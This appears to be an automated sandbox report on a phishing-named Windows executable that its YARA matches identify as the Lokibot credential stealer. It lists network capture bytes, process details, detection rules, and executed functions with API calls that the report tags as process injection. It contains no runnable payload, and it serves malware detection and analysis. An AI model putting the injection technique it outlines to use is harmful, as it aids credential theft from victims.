May 22, 2024 22:03:46.150197029 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 22, 2024 22:03:46.150209904 CEST	224	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener(
May 22, 2024 22:03:46.152543068 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 22, 2024 22:03:46.152556896 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 22, 2024 22:03:46.152570963 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 22, 2024 22:03:46.157201052 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:03:46.159548044 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 22, 2024 22:03:46.159567118 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important

Target ID:	0
Start time:	16:01:36
Start date:	22/05/2024
Path:	C:\Users\user\Desktop\FedEx_776282383902.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FedEx_776282383902.exe"
Imagebase:	0xc30000
File size:	539'656 bytes
MD5 hash:	D8754EAD54BC3CCD3BB50E726362AEF9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:01:37
Start date:	22/05/2024
Path:	C:\Users\user\Desktop\FedEx_776282383902.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FedEx_776282383902.exe"
Imagebase:	0x630000
File size:	539'656 bytes
MD5 hash:	D8754EAD54BC3CCD3BB50E726362AEF9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.3%
Total number of Nodes:	231
Total number of Limit Nodes:	13

Executed Functions

Function 06194748 Relevance: 2.8, Strings: 2, Instructions: 259
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

yO6, xrefs: 06194849
UJ, xrefs: 061949FB

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID: UJ$yO6
API String ID: 0-870398751
Opcode ID: 375d1ca830debc8fed103e7e6c0441ebd8a08b9f365e54c3a53169bb6232fc4e
Instruction ID: f87d123b5a816176a738b5895b52fcda0bc3579730921eca45dc486104df5f99
Opcode Fuzzy Hash: 375d1ca830debc8fed103e7e6c0441ebd8a08b9f365e54c3a53169bb6232fc4e
Instruction Fuzzy Hash: 18B13470D14219DFDF58CFA6D9805AEFBF2BF8A300F14992AD015AB264DB3499068F54

Function 06194758 Relevance: 2.8, Strings: 2, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

yO6, xrefs: 06194849
UJ, xrefs: 061949FB

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID: UJ$yO6
API String ID: 0-870398751
Opcode ID: 25b3297ac13986e49ce5e1dfbc539bc604a473fb1d5d14cd82bfafce2391c8d8
Instruction ID: b01e6a2faeb0f09ed8765e45998138baed86bcc6d7dcfd0c32c34e10f939562e
Opcode Fuzzy Hash: 25b3297ac13986e49ce5e1dfbc539bc604a473fb1d5d14cd82bfafce2391c8d8
Instruction Fuzzy Hash: 52B11370E1421DDFDF58CFA6D98059EFBF2BF89300F24992AD019AB264DB3499068F54

Function 06193BE8 Relevance: 2.7, Strings: 2, Instructions: 209
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%)Y, xrefs: 06193E22
!>c8, xrefs: 06193DC5

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID: !>c8$%)Y
API String ID: 0-2922296349
Opcode ID: c373e8dd06b0d5a20fd81ad75d82b30144e75ae7bbf990ce33e59d044c61b10a
Instruction ID: e70f4bf15e0fb19939e7e2108471f4559905008f7b28ee38c9944a36094b9edb
Opcode Fuzzy Hash: c373e8dd06b0d5a20fd81ad75d82b30144e75ae7bbf990ce33e59d044c61b10a
Instruction Fuzzy Hash: 49815771D19619EFCF48CFA6E58049EFBB2FF89300F10942AE029AB264D7308942CF50

Function 06193BF8 Relevance: 2.7, Strings: 2, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%)Y, xrefs: 06193E22
!>c8, xrefs: 06193DC5

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID: !>c8$%)Y
API String ID: 0-2922296349
Opcode ID: 59c22396e80252b75e86124f37ef0c7651fa216ce16f31cc4ff885f046e29c8d
Instruction ID: a10a7cccb0d78a54174f26403fae04d49f85fc216060162dadb9440529f58c44
Opcode Fuzzy Hash: 59c22396e80252b75e86124f37ef0c7651fa216ce16f31cc4ff885f046e29c8d
Instruction Fuzzy Hash: 49814770D14619EFDF48CFA6E58459EFBB2FF89310F10942AE429AB264D7309942CF50

Function 01490040 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1218048613.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1490000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0b5f44aa39098f28aa297dfc77d938f020d6606c29c9e834a69f48886c54e5e
Instruction ID: 065a57469f40bb9b29a0165cdc0e1de1627328feef8c08788d520b00641edbba
Opcode Fuzzy Hash: e0b5f44aa39098f28aa297dfc77d938f020d6606c29c9e834a69f48886c54e5e
Instruction Fuzzy Hash: DB71F7B1D05229CBDB68CF66C8417E9BBBABF89300F10C1EAD50DA7251EB705A85CF40

Function 061988F0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 660d7274490bcae25cc5d6db1a6c00714bef6ee1a3ba96241870c63b3b45575f
Instruction ID: 5f234a39d66c05a12c0ca9cacc5f9944b8b05c164f488339bdea5106ba6f7f2d
Opcode Fuzzy Hash: 660d7274490bcae25cc5d6db1a6c00714bef6ee1a3ba96241870c63b3b45575f
Instruction Fuzzy Hash: BA31DBB0D056188FEB58CFA7C9543EEFFF6AFCA300F18C46AD009A6255DB7409458B60

Function 06198900 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c2d0199f97a509cb6da558ed864f217a87bece1f0a86a49c0f24cfdcb81778a
Instruction ID: 1e43e10699c6c558b7c1888de861f820abf98aec33ee93b8756ca72baa6fbacb
Opcode Fuzzy Hash: 5c2d0199f97a509cb6da558ed864f217a87bece1f0a86a49c0f24cfdcb81778a
Instruction Fuzzy Hash: 0721C6B0D146189BEB58CF9BC9453EEFAFBAFC9300F18C46AD40966254DB7409458FA1

Function 012CD3A8 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 012CD436
GetCurrentThread.KERNEL32 ref: 012CD473
GetCurrentProcess.KERNEL32 ref: 012CD4B0
GetCurrentThreadId.KERNEL32 ref: 012CD509

Memory Dump Source

Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d48df3af724b946370370845706a61a2cb6e82d1b82e27bad240ccb1701755ee
Instruction ID: f84bdc350403ea4ea7a17139ab024fdab120a5b2231853d6a0404a05a99d0778
Opcode Fuzzy Hash: d48df3af724b946370370845706a61a2cb6e82d1b82e27bad240ccb1701755ee
Instruction Fuzzy Hash: BC5167B090134A8FEB14DFA9D5487DEBBF1FF48304F248169D119A73A0D7386945CB65

Function 012CD3B8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 012CD436
GetCurrentThread.KERNEL32 ref: 012CD473
GetCurrentProcess.KERNEL32 ref: 012CD4B0
GetCurrentThreadId.KERNEL32 ref: 012CD509

Memory Dump Source

Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6fe82ac54f7df4146e3f8e967fdd697a096bbd16fa9d8158106238b17b13b8fe
Instruction ID: 8083b51fae5379f5f52cd6b89815e54fe826575e3150828d2c799680adca6a69
Opcode Fuzzy Hash: 6fe82ac54f7df4146e3f8e967fdd697a096bbd16fa9d8158106238b17b13b8fe
Instruction Fuzzy Hash: 715155B090130A8FEB14DFAAD548BDEBBF1FF48314F208169D119A72A0DB34A945CF65

Function 0619E1EC Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0619E42E

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6e793b28dfdb67b47c90a75fc51dad2ebaf613d98091b97ce310343ebc684911
Instruction ID: d36e7aca2e0f32e9b4d126b94232b6e9be36e97ed0a3c1443ba21424dd56c177
Opcode Fuzzy Hash: 6e793b28dfdb67b47c90a75fc51dad2ebaf613d98091b97ce310343ebc684911
Instruction Fuzzy Hash: 09A15C71D007198FEF64DF69C841BEDBBB2BF44314F1485A9E808A7280DB759A85CFA1

Function 0619E1F8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0619E42E

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: da8081898953d82e4b3a598911dddf2dd000af3824e08b2c6dbfdf7991132c88
Instruction ID: 14d640386f3171c495309fad9342a088ca743c42cb3d1eb4bdc69af91866477e
Opcode Fuzzy Hash: da8081898953d82e4b3a598911dddf2dd000af3824e08b2c6dbfdf7991132c88
Instruction Fuzzy Hash: AF915C71D007198FEF64DF69C841BEDBBB2BF48314F148569E808A7250DB749A85CFA1

Function 012CAD28 Relevance: 1.7, APIs: 1, Instructions: 197COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 012CAF7E

Memory Dump Source

Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7c3572cd816644283bc88a8e89df67d214cfe9725334d5d01e637c3ce5a1c989
Instruction ID: 7a26df87cb51f636432fa95f2df7fb2ba61265231caccbb6823369ef2779eed8
Opcode Fuzzy Hash: 7c3572cd816644283bc88a8e89df67d214cfe9725334d5d01e637c3ce5a1c989
Instruction Fuzzy Hash: 48712470A10B0A8FE725DF29D44075ABBF1FF88604F008A2DD68AD7A50E775E945CF91

Function 012C58EC Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 012C59A9

Memory Dump Source

Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1c864faa087d9eb871794db74d67417997176eb024fee71b82f4712e000b6963
Instruction ID: 27a46610e2a729b99dee663e582e33f8282643f86191c7816528c8308bd15df0
Opcode Fuzzy Hash: 1c864faa087d9eb871794db74d67417997176eb024fee71b82f4712e000b6963
Instruction Fuzzy Hash: B5512071D1071ACFEB24CFAAC84478EBBF1BF49314F20816AD218AB251D775A946CF90

Function 012C44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 012C59A9

Memory Dump Source

Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e47f2c69c4eb825b9eed3acee4e4641dba6d708ad2ad2b98d3a0936fca110d40
Instruction ID: 812a1748883893bd294e4e61c75026d39599965d38f54a1dea305149d007dcde
Opcode Fuzzy Hash: e47f2c69c4eb825b9eed3acee4e4641dba6d708ad2ad2b98d3a0936fca110d40
Instruction Fuzzy Hash: BA410270D1071DCBEB24DFAAC844B8EBBF1BF49704F20816AD518AB251DB756946CF90

Function 012CD6C1 Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CD687

Memory Dump Source

Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1a868dc2e5597c75c4fa83f525bd107c2d28d5e5ae26cb1c02ad01f694ac8bc6
Instruction ID: 12f18e59a6ed3e441fddbd84ccedb1fbbf1659186d72872a10173cba967b22ce
Opcode Fuzzy Hash: 1a868dc2e5597c75c4fa83f525bd107c2d28d5e5ae26cb1c02ad01f694ac8bc6
Instruction Fuzzy Hash: 3931A234641380CFE314EF66E4847293BA6F784710FA1917AEA169B3D8DBBC4949CF11

Function 0619DF68 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0619E000

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c167f9813fd2d074226b773338e9e7f76447000eb591e526b4229fc13c524221
Instruction ID: b69f849557d5c41f1d84d43953bc32d89bbcb37967bf371c9807f9b314aa1ec5
Opcode Fuzzy Hash: c167f9813fd2d074226b773338e9e7f76447000eb591e526b4229fc13c524221
Instruction Fuzzy Hash: 8B213771D003499FDB20CFA9C881BDEBBF5FF48310F54892AE958A7241CB799944CBA4

Function 0619DF70 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0619E000

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1fcae5f058f432e9c8d3027b4a29338136e894849c93a9703bccf3dc46f3e269
Instruction ID: fede1bdf5dacd3c20452e3313d8a5d5a3b8befa58e1d413dfa559cec59997234
Opcode Fuzzy Hash: 1fcae5f058f432e9c8d3027b4a29338136e894849c93a9703bccf3dc46f3e269
Instruction Fuzzy Hash: 0B211371D003099FDB20DFAAC885BDEBBF5FF48310F54842AE958A7240CB799941CBA4

Function 0619D999 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0619DA1E

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e5231babec444daa2a71410e2d7a99f69ca9487b89f208644324ed41490719b7
Instruction ID: 03d2cea23cf22acf8b7bc7f9f64940aee0922d6fcfb83378ad4d63b9efeb4ef3
Opcode Fuzzy Hash: e5231babec444daa2a71410e2d7a99f69ca9487b89f208644324ed41490719b7
Instruction Fuzzy Hash: D3214571D003098FDB20DFAAC481BAEBBF4AF49320F14842ED459A7240CB78A945CFA4

Function 0619E058 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0619E0E0

Memory Dump Source

Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 23fd2247fe42b4430a6efcd9edbce5e82b31453839853430349ba8bcaa6625df
Instruction ID: 5b0c93056e5bb576eb6acd73df1750a88bd53120d8ccf5e205a6c7baa46f3c18
Opcode Fuzzy Hash: 23fd2247fe42b4430a6efcd9edbce5e82b31453839853430349ba8bcaa6625df
Instruction Fuzzy Hash: B9210771D003599FDB10DFAAC841BDEBBF5FF48310F548429E959A7240CB799941CBA4

Function 012CD5F8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CD687

Memory Dump Source

Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
